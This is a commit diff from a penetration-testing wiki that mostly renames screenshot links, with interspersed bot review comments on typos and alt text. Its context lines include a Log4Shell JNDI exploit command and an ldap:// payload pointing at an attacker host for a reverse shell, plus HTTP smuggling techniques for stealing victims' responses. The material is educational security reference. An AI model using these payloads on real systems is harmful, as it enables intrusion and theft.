GitBook: [#3047] No subject
carlospolop authored and gitbook-bot committed Mar 9, 2022
1 parent 6eaa6e8 commit 167b04d
Showing 87 changed files with 209 additions and 38 deletions.
Binary file added .gitbook/assets/image (201) (2) (1).png
Binary file modified .gitbook/assets/image (201) (2).png
Binary file modified .gitbook/assets/image (201).png
Binary file added .gitbook/assets/image (465) (2).png
Binary file modified .gitbook/assets/image (465).png
Binary file added .gitbook/assets/image (630) (1) (1).png
Binary file modified .gitbook/assets/image (630) (1).png
Binary file modified .gitbook/assets/image (630).png
Binary file added .gitbook/assets/image (634) (1).png
Binary file modified .gitbook/assets/image (634).png
Binary file added .gitbook/assets/image (635) (1) (1) (1).png
Binary file modified .gitbook/assets/image (635) (1) (1).png
Binary file modified .gitbook/assets/image (635) (1).png
Binary file modified .gitbook/assets/image (635).png
Binary file added .gitbook/assets/image (636) (1).png
Binary file modified .gitbook/assets/image (636).png
Binary file added .gitbook/assets/image (637) (1) (1).png
Binary file modified .gitbook/assets/image (637) (1).png
Binary file modified .gitbook/assets/image (637).png
Binary file added .gitbook/assets/image (638) (1).png
Binary file modified .gitbook/assets/image (638).png
Binary file added .gitbook/assets/image (640) (1).png
Binary file modified .gitbook/assets/image (640).png
Binary file added .gitbook/assets/image (642) (1) (1) (1) (1).png
Binary file modified .gitbook/assets/image (642) (1) (1).png
Binary file modified .gitbook/assets/image (642) (1).png
Binary file modified .gitbook/assets/image (642).png
Binary file added .gitbook/assets/image (643) (1).png
Binary file modified .gitbook/assets/image (643).png
Binary file added .gitbook/assets/image (644) (1).png
Binary file modified .gitbook/assets/image (644).png
Binary file added .gitbook/assets/image (645) (1) (1).png
Binary file modified .gitbook/assets/image (645) (1).png
Binary file modified .gitbook/assets/image (645).png
Binary file added .gitbook/assets/image (646) (1) (1).png
Binary file modified .gitbook/assets/image (646) (1).png
Binary file modified .gitbook/assets/image (646).png
Binary file added .gitbook/assets/image (647) (1).png
Binary file modified .gitbook/assets/image (647).png
Binary file added .gitbook/assets/image (648) (1) (1).png
Binary file modified .gitbook/assets/image (648) (1).png
Binary file modified .gitbook/assets/image (648).png
Binary file added .gitbook/assets/image (649) (1) (1).png
Binary file modified .gitbook/assets/image (649) (1).png
Binary file modified .gitbook/assets/image (649).png
Binary file modified .gitbook/assets/image (650).png
Binary file added .gitbook/assets/image (652) (1).png
Binary file modified .gitbook/assets/image (652).png
Binary file added .gitbook/assets/image (653) (1) (1).png
Binary file modified .gitbook/assets/image (653) (1).png
Binary file modified .gitbook/assets/image (653).png
Binary file added .gitbook/assets/image (654) (1) (1) (1).png
Binary file modified .gitbook/assets/image (654) (1) (1).png
Binary file modified .gitbook/assets/image (654) (1).png
Binary file modified .gitbook/assets/image (654).png
Binary file added .gitbook/assets/image (655) (1) (1).png
Binary file modified .gitbook/assets/image (655) (1).png
Binary file modified .gitbook/assets/image (655).png
Binary file added .gitbook/assets/image (656) (1) (1).png
Binary file modified .gitbook/assets/image (656) (1).png
Binary file modified .gitbook/assets/image (656).png
Binary file modified .gitbook/assets/image (657).png
Binary file added .gitbook/assets/image (658) (1).png
Binary file modified .gitbook/assets/image (658).png
Binary file added .gitbook/assets/image (659) (1).png
Binary file modified .gitbook/assets/image (659).png
Binary file added .gitbook/assets/image (661) (1) (1).png
Binary file modified .gitbook/assets/image (661) (1).png
Binary file modified .gitbook/assets/image (661).png
Binary file added .gitbook/assets/image (662) (1) (1).png
Binary file modified .gitbook/assets/image (662) (1).png
Binary file modified .gitbook/assets/image (662).png
2 changes: 1 addition & 1 deletion README.md
Expand Up @@ -30,7 +30,7 @@ If you want to **share some tricks with the community** you can also submit **pu

### [STM Cyber](https://www.stmcyber.com)

![](<.gitbook/assets/image (642) (1).png>)
![](<.gitbook/assets/image (642) (1) (1).png>)

[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentestings, Red teams and training.

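Review bot: The sponsor logo in this hunk is embedded as `![](<.gitbook/assets/image (642) (1) (1).png>)`, with empty alt text and an auto-generated, counter-suffixed file name. Give the asset a stable, descriptive name and fill in the alt text, so that the README reference does not have to be rewritten each time the asset counter shifts, as it is here.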
2 changes: 1 addition & 1 deletion cloud-security/github-security/basic-github-information.md
Expand Up @@ -63,7 +63,7 @@ You can also **create your own roles** in _https://github.com/organizations/\<or

You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.

![](<../../.gitbook/assets/image (630).png>)
![](<../../.gitbook/assets/image (630) (1).png>)

### Users

2 changes: 1 addition & 1 deletion cloud-security/workspace-security.md
Expand Up @@ -86,7 +86,7 @@ If someone creates a **copy** of that **document** that **contained the App Scri

This method will be able to bypass also the Workspace admin restriction:

![](<../.gitbook/assets/image (662).png>)
![](<../.gitbook/assets/image (662) (1).png>)

But can be prevented with:

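Review bot: The new target `image (662) (1).png` is not a new file: the list of changed files marks it as modified, and a later hunk in this same commit moves another page off that exact name to `image (662) (1) (1).png`. The name therefore points at a different picture before and after this commit, so any reference that is not rewritten here will silently show the wrong screenshot next to the sentence about bypassing the Workspace admin restriction. Confirm that no other page still links the old name, or switch to file names that are not reassigned between commits.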
Original file line number Diff line number Diff line change
Expand Up @@ -37,7 +37,7 @@ URLs example to abuse JNDI:

### JNDI Example

![](<../../.gitbook/assets/image (655).png>)
![](<../../.gitbook/assets/image (655) (1).png>)

Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("<attacker-controlled-url>")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.

Expand Down Expand Up @@ -75,7 +75,7 @@ In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDA

#### Deserialization exploit

![](<../../.gitbook/assets/image (654) (1).png>)
![](<../../.gitbook/assets/image (654) (1) (1).png>)

The **exploit is serialized** and will be deserialized.\
In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
Expand Down Expand Up @@ -342,7 +342,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
```

![](<../../.gitbook/assets/image (642).png>)
![](<../../.gitbook/assets/image (642) (1).png>)

Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/qvrxbu}`**

Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,7 @@

The main origin of this vulnerability is the fact that the **reverse proxy** is going to **talk with the client** using **HTTP/2** but then it will **transform** that **communication** with the **back-end server** to **HTTP/1.1**.

![](<../../.gitbook/assets/image (636).png>)
![](<../../.gitbook/assets/image (636) (1).png>)

The problem with this approach is that the **user** is going to be able to **inject** unnecessarily **headers** in the **HTTP/2 communication** that probably **won't be checked** by the proxy. But then, when those are **injected blindly in the HTTP/1.1 communication**, **a request smuggling attack can be performed**.

Expand All @@ -28,15 +28,15 @@ This technique was abused on AWS load balancer, so making sure that the users ac

This is exactly the same technique as before, but checking the requests James noticed that clients were asking to send him their credentials, so he just modified his server to allow CORS to send him peoples credentials:

![](<../../.gitbook/assets/image (662) (1).png>)
![](<../../.gitbook/assets/image (662) (1) (1).png>)

### H2.TE via Request Header Injection

**HTTP/2 also won't allow to put not permitted characters in headers**, but if the server **isn't respecting** this rule, you can **inject arbitrary headers** when the communication is **downgraded** to HTTP/1.1.

In this case **the header Transfer-Encoding was injected**.

![](<../../.gitbook/assets/image (648) (1).png>)
![](<../../.gitbook/assets/image (648) (1) (1).png>)

### H2.TE via Header Name Injection

Expand All @@ -46,19 +46,19 @@ HTTP/2 on some servers lets you put a **colon in the header name, and with a \r\

Note that if you put just the new line characters sending a header without content, the request is going to be treated as **invalid**:

![](<../../.gitbook/assets/image (647).png>)
![](<../../.gitbook/assets/image (647) (1).png>)

### H2.TE via Request LIne Injection

In this case the injection was performed inside the request line:

![](<../../.gitbook/assets/image (640).png>)
![](<../../.gitbook/assets/image (640) (1).png>)

### URL Prefix Injection

Inside the scheme of the HTTP/2 connection you might be able to send a full URL that will overwrite the one indicated in the path:

![](<../../.gitbook/assets/image (661).png>)
![](<../../.gitbook/assets/image (661) (1).png>)

### Request Line Injection via spaces

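Review bot: The heading `### H2.TE via Request LIne Injection` in this hunk's context has a capitalisation typo (`LIne`), worth fixing while the section is being touched. The three sections shown here end in a colon and leave the actual request to a screenshot with empty alt text, so after this rename their content depends entirely on `image (647) (1).png`, `image (640) (1).png` and `image (661) (1).png` resolving to the right pictures; add alt text or a one-line caption saying what each one shows.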
Expand All @@ -72,7 +72,7 @@ Note that **even** with that **restriction** you still can perform attacks like

Usually this restriction doesn't exist so you can **smuggle request into the connection between the reverse proxy and the back end** that other people are using, but it's even **possible** that the **proxy** doesn't **even reuse a connection with connections from the same IP** (pretty heavy restriction for this kind of attack).

![](<../../.gitbook/assets/image (646) (1).png>)
![](<../../.gitbook/assets/image (646) (1) (1).png>)

In the heaviest restriction (no connection reuse) you will detect the vulnerability with the Time Based technique, but then testing it you will find that it's a "false positive".

Expand All @@ -84,7 +84,7 @@ The **problem** with **HTTP/1.1** is that if you **receive 2 HTTP responses** yo

However, this technique can be used **in HTTP/2** because if the endpoint was **vulnerable** and you smuggled one request, you will see the **headers of the response to the smuggled request in the response from the reverse proxy**:

![](<../../.gitbook/assets/image (652).png>)
![](<../../.gitbook/assets/image (652) (1).png>)

### Tunnel-vision Problem

Expand All @@ -98,7 +98,7 @@ However, the **HEAD** request **doesn't contain a body** but it usually **contai

If you find a **POST** **parameter** inside the application whose **content** is going to be **reflected** in the **response**, then you can try to inject HTTP/1.1 \r\n characters inside a HTTP/2 request header so the newly injected headers by the proxy are going to be appended in the POST parameter that will be reflected in the response:

![](<../../.gitbook/assets/image (656) (1).png>)
![](<../../.gitbook/assets/image (656) (1) (1).png>)

Note that in this case the **attacker** just cares about the **response** to the **first** **request**, he doesn't need to read the request to the smuggled invalid second request.

Expand All @@ -112,7 +112,7 @@ In this scenario a **HEAD** request to the **URL** **whose** **cache** is going

Due to the fact the the **HEAD response contains the `Content-Type: text/html`** and because the reverse proxy thinks that the **whole response to the smuggled request is the body of the HEAD** request, the **XSS payload** is going to be **treated as HTML** even if the page wasn't vulnerable to XSS.

![](<../../.gitbook/assets/image (659).png>)
![](<../../.gitbook/assets/image (659) (1).png>)

## Hidden HTTP/2

18 changes: 9 additions & 9 deletions pentesting-web/http-response-smuggling-desync.md
Expand Up @@ -14,17 +14,17 @@ HTTP/1.1 allows to ask for **different resources without needing to wait for pre

However, there is a problem desynchronising the responses queue. If an attacker send a HTTP Response smuggling attack and the responses to the **initial request and the smuggled one are responded immediately**, the smuggled response won't be inserted inside the queue of the victim response but will **just be discarded as an error**.

![](<../.gitbook/assets/image (635) (1) (1).png>)
![](<../.gitbook/assets/image (635) (1) (1) (1).png>)

Therefore, it's needed that the **smuggled** **request** **takes more time to be processed** inside the back-end server. Therefore, by the time the smuggled request is processed, the communication with the attacker will be over.

If in this specific situation a **victim has sent a request** and the **smuggled request is responded before** the legitimate request, the **smuggled response will be sent to the victim**. Therefore, the attacker will be **controlling the request "performed" by the victim**.

Moreover, is the **attacker then perform a request** and the **legitimate response** to the **victim** request is **answered** **before** the attackers request. The **response to the victim is going to be sent to the attacker**, **stealing** the response to the victim (which can contains for example the header **Set-Cookie**).

![](<../.gitbook/assets/image (658).png>)
![](<../.gitbook/assets/image (658) (1).png>)

![](<../.gitbook/assets/image (655) (1).png>)
![](<../.gitbook/assets/image (655) (1) (1).png>)

### Multiple Nested Injections

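Review bot: In the context paragraph that begins `Moreover, is the **attacker then perform a request**`, `is` should be `if` and `perform` should be `performs`. Further down, the two adjacent references `image (658) (1).png` and `image (655) (1) (1).png` follow each other with no caption or alt text, so nothing in the text says which figure illustrates which step of the desynchronisation; a short caption per image would keep the explanation readable if either name is reassigned again.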
Expand Down Expand Up @@ -52,7 +52,7 @@ First, the attacker send a payload containing a **final POST request with the re

Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:

![](<../.gitbook/assets/image (634).png>)
![](<../.gitbook/assets/image (634) (1).png>)

Then, the **victim** will **receive** the **response to the sleepy** request and if in the meantime the **attacker** **sent** **another** **request**, the **response from the reflected content request will be sent to him**.

Expand Down Expand Up @@ -80,15 +80,15 @@ Then, the **victim** will **receive** the **response** from the **HEAD** request

Following the previous example, knowing that you can **control the body** of the request whose response is going to receive the victim and that a **HEAD** **response** usually contains in its headers the **Content-Type and the Content-Length**, you can **send a request like the following** one to **cause XSS** in the victim without the page being vulnerable to XSS:

![](<../.gitbook/assets/image (654) (1) (1).png>)
![](<../.gitbook/assets/image (654) (1) (1) (1).png>)

### Cache Poisoning

Abusing the previously commented response desynchronisation Content Confusion attack, i**f the cache stores the response to the request performed by the victim and this response is an injected one causing a XSS, then the cache is poisoned**.

Malicious request containing the XSS payload:

![](<../.gitbook/assets/image (644).png>)
![](<../.gitbook/assets/image (644) (1).png>)

Malicious response to the victim that contains the header that indicates to the cache to store the response:

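Review bot: The context line under `### Cache Poisoning` has a misplaced bold marker, `i**f the cache stores ...`, which splits the word `if`; the opening `**` belongs before the `i`. The line `Malicious request containing the XSS payload:` is followed only by the re-linked image with empty alt text, so describe in the alt text what the request contains rather than relying on the picture alone.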
Expand All @@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **

This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**

![](<../.gitbook/assets/image (630) (1).png>)
![](<../.gitbook/assets/image (630) (1) (1).png>)

### Response Splitting

Expand All @@ -112,11 +112,11 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl

He will send a **exploit** like:

![](<../.gitbook/assets/image (649) (1).png>)
![](<../.gitbook/assets/image (649) (1) (1).png>)

After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:

![](<../.gitbook/assets/image (661) (1).png>)
![](<../.gitbook/assets/image (661) (1) (1).png>)

The victim will receive as response the **HEAD response + the content of the second request response (containing part of the reflected data):**

Original file line number Diff line number Diff line change
Expand Up @@ -66,7 +66,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
spoofed.burpcollaborator.net = 127.0.0.1
```

![](<../../.gitbook/assets/image (649).png>)
![](<../../.gitbook/assets/image (649) (1).png>)

### Domain Parser

2 changes: 1 addition & 1 deletion pentesting/1883-pentesting-mqtt-mosquitto.md
Expand Up @@ -15,7 +15,7 @@ PORT STATE SERVICE REASON

MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**

![](<../.gitbook/assets/image (645).png>)
![](<../.gitbook/assets/image (645) (1).png>)

### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)****

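Review bot: The heading at the end of this hunk, `### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)****`, carries stray `****` runs around the link that add nothing and should be dropped. The `0x05 example:` that the changed line points to exists only as a picture with empty alt text; stating in the alt text what the capture shows would keep the sentence meaningful if the image fails to resolve.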
Original file line number Diff line number Diff line change
Expand Up @@ -60,7 +60,7 @@ _This method requires you to run `kubectl` as an **authenticated user**._

**NodePort opens a specific port on all the Nodes** (the VMs), and any **traffic** that is sent to this port is **forwarded to the service**. This is a really bad option usually.

![](<../../.gitbook/assets/image (635) (1).png>)
![](<../../.gitbook/assets/image (635) (1) (1).png>)

An example of NodePort specification:

Expand All @@ -87,7 +87,7 @@ If you **don't specify** the **nodePort** in the yaml (it's the port that will b

Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service.

![](<../../.gitbook/assets/image (654).png>)
![](<../../.gitbook/assets/image (654) (1).png>)

You have to pay for a LoadBalancer per exposed service, which can get expensive.

Expand Down Expand Up @@ -139,7 +139,7 @@ Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it

You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.

![](<../../.gitbook/assets/image (653).png>)
![](<../../.gitbook/assets/image (653) (1).png>)

The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.

Original file line number Diff line number Diff line change
Expand Up @@ -150,7 +150,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only

The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**

![](<../../.gitbook/assets/image (637).png>)
![](<../../.gitbook/assets/image (637) (1).png>)

The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:

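Review bot: The sentence above the changed line has a bold marker in the middle of a word (`**default anonymous acce**ss`); move the closing `**` to after `access`. The statement about the default is backed only by a screenshot with empty alt text, so quote the relevant sentence from the linked Kubelet documentation as text, which stays searchable and does not depend on the renamed asset.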
4 changes: 2 additions & 2 deletions pentesting/pentesting-network/README.md
Expand Up @@ -299,7 +299,7 @@ yersinia -I #Interactive mode
yersinia -G #For graphic mode
```

![](<../../.gitbook/assets/image (646).png>)
![](<../../.gitbook/assets/image (646) (1).png>)

To access the VLAN packets

Expand Down Expand Up @@ -344,7 +344,7 @@ If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**

Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.

![](<../../.gitbook/assets/image (635).png>)
![](<../../.gitbook/assets/image (635) (1).png>)

To perform this attack you could use scapy: `pip install scapy`

2 changes: 1 addition & 1 deletion radio-hacking/pentesting-ble-bluetooth-low-energy.md
Expand Up @@ -8,7 +8,7 @@ BLE devices communicate is by sending **advertising packets** (**beacons**), the

The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.

![](<../.gitbook/assets/image (201) (2).png>)
![](<../.gitbook/assets/image (201) (2) (1).png>)

The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.

2 changes: 1 addition & 1 deletion todo/hardware-hacking/README.md
Expand Up @@ -8,7 +8,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl

We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).

![](<../../.gitbook/assets/image (648).png>)
![](<../../.gitbook/assets/image (648) (1).png>)

Hardware tools to communicate with UART:

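Review bot: The 8N1 example in this hunk's context ends with `0 (the stop bit)`, which does not match the idle level given in the hunk header's context line (`the line is held high (at a logical 1 value)`). Check the stop bit value and the bit order in that sentence against the figure being re-linked here and make the text and the picture agree.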
4 changes: 2 additions & 2 deletions todo/hardware-hacking/i2c.md
Expand Up @@ -12,7 +12,7 @@ To connect with the bus pirate you can follow the docs:

In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:

![](<../../.gitbook/assets/image (465).png>)
![](<../../.gitbook/assets/image (465) (2).png>)

To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
Expand Down Expand Up @@ -120,7 +120,7 @@ NACK

In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:

![](<../../.gitbook/assets/image (201).png>)
![](<../../.gitbook/assets/image (201) (2).png>)

```bash
I2C>m